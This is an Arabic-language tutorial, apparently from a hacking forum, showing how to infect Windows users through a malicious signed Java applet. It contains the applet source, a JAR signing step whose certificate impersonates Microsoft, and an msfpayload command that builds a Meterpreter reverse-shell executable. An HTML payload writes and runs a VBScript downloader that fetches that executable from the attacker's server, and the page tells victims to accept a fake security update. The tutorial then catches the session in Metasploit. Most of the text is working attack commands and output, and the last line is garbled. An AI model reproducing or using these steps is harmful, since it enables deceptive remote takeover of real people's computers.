في البداية يجب أن نحمل جافا
كود:
root@bt4:/# apt-get install sun-java6-jdk
نقوم بإنشاء مجلد ونسميه ****-applet
كود:
root@bt4:/# mkdir ./java-applet
root@bt4:/# cd ./java-applet
بعد الدخول إلى المجلد نقوم بتحميل script و من أراد نسخه
حفض هذا الكود بإسم MSFcmd.java في مجلد جافا -applet
كود:
import java.applet.*;
import java.awt.*;
import java.io.*;
public class MSFcmd extends Applet {
public void init() {
Process f;
String first = getParameter("first");
try {
f = Runtime.getRuntime().exec("first");
}
catch(IOException e) {
e.printStackTrace();
}
Process s;
}
}
بعد تحميل script وإضافة كود جافا MSFcmd.جافا نقوم بتشغيل بالأمر ./makeapplet.sh
كود:
root@bt4:/java-applet/# ./makeapplet.sh
Enter the **** of the Applet without the extension: MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
What is your first and last ****? [Unknown]: MSFcmd
What is the **** of your organizational unit? [Unknown]: Microsoft
What is the **** of your organization? [Unknown]: Microsoft Organization
What is the **** of your City or Locality? [Unknown]: Redmond
What is the **** of your State or Province? [Unknown]: Washington
What is the two-letter country code for this unit? [Unknown]: US
Is CN=MSFcmd, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Washington, C=US correct? [no]: yes
[+] Signing the JAR file
Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file
[+] Done
عند الحصول على done وإدخال الاجابات المكتوبة بلون الأحمر نكتب الكود التالي
كود:
root@bt4:/java-applet/# cp SignedMSFcmd.jar /var/www/
كود:
root@bt4:/java-applet/# cp MSFcmd.class /var/www/
كود:
root@bt4:/java-applet/# apache2ctl start
نعمل باكدور بالأداة msfpayload
كود:
root@bt4:/pentest/exploits/framework3/# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 R | ./msfencode -t exe -o my.exe
كود:
root@bt4:/pentest/exploits/framework3/# cp ./my.exe /var/www
/
كود:
root@bt4:/pentest/exploits/framework3/# chmod a+x /var/www/my.exe
الأن سنقوم بعمل صفحة ملقمة بالبكدور مع رسالة جافا لتحديث أمني ونقنع الضحية بالموافقة عليه
تغيير x xx x إلى ip
إعدادات الصفحة html في المرفقات
كود:
root@bt4:/pentest/exploits/framework3/# echo "<applet width='1' height='1' code='MSFcmd.class' archive='SignedMSFcmd.jar'>" >
/var/www/index.html
كود:
root@bt4:/pentest/exploits/framework3/# echo "<param name='first' value='cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C: windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\my.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://X.X.X.X/my.exe C:\windows\my.exe'> </applet>" >> /var/www/index.html
كود:
root@bt4:/pentest/exploits/framework3/# echo "" >> /var/www/index.html
كود:
root@bt4:/pentest/exploits/framework3/# echo "Please wait. We appreciate your business. This process may take a while." >> /var/www/index.html
كود:
root@bt4:/pentest/exploits/framework3/# echo "To view this page properly you must accept and run the applet.
We are sorry for any inconvenience. " >> /var/www/index.html
نقوم الأن بتشغيل ميسبلويت مع الإداة multi/handler وبايلود meterpreter /reverse_tcp
كود:
msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 443
LPORT +> 443
msf exploit(handler) > save
Saved configuration to: /root/.msf3/config
msf exploit(handler) >exploit -j[*] Exploit running as background job.[*] Started reverse handler[*] Starting the payload handler
..
.
بعد الموافقة على التحديث ستفتح sessions
كود:
msf exploit(handler) >[*] Sending stage (718336 bytes)[*] Meterpreter session 1 opened (A.A.A.A:443 -> T.T.T.T:44477)
msf exploit(handler) > sessions -i 1[*] Starting interaction with 1...
meterpreter > ps
Process list
============
PID **** Path
--- ---- ----
204 jusched.exe C:\ProgramFiles\****\jre6\bin\jusched.exe
288 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe
744 smss.exe \SystemRoot\System32\smss.exe
912 winlogon.exe C:\WINDOWS\system32\winlogon.exe
972 services.exe C:\WINDOWS\system32\services.exe
984 lsass.exe C:\WINDOWS\system32\lsass.exe
1176 svchost.exe C:\WINDOWS\system32\svchost.exe
1256 ****.exe C:\Program Files\****\jre6\bin\****.exe
1360 svchost.exe C:\WINDOWS\System32\svchost.exe
1640 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1712 Explorer.EXE C:\WINDOWS\Explorer.EXE
1872 jqs.exe C:\Program Files\****\jre6\bin\jqs.exe
2412 my.exe C:\windows\my.exe
3052 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
meterpreter >
كما في الصورة التالية
avp hghojvhr uk 'vdr Applet Infection java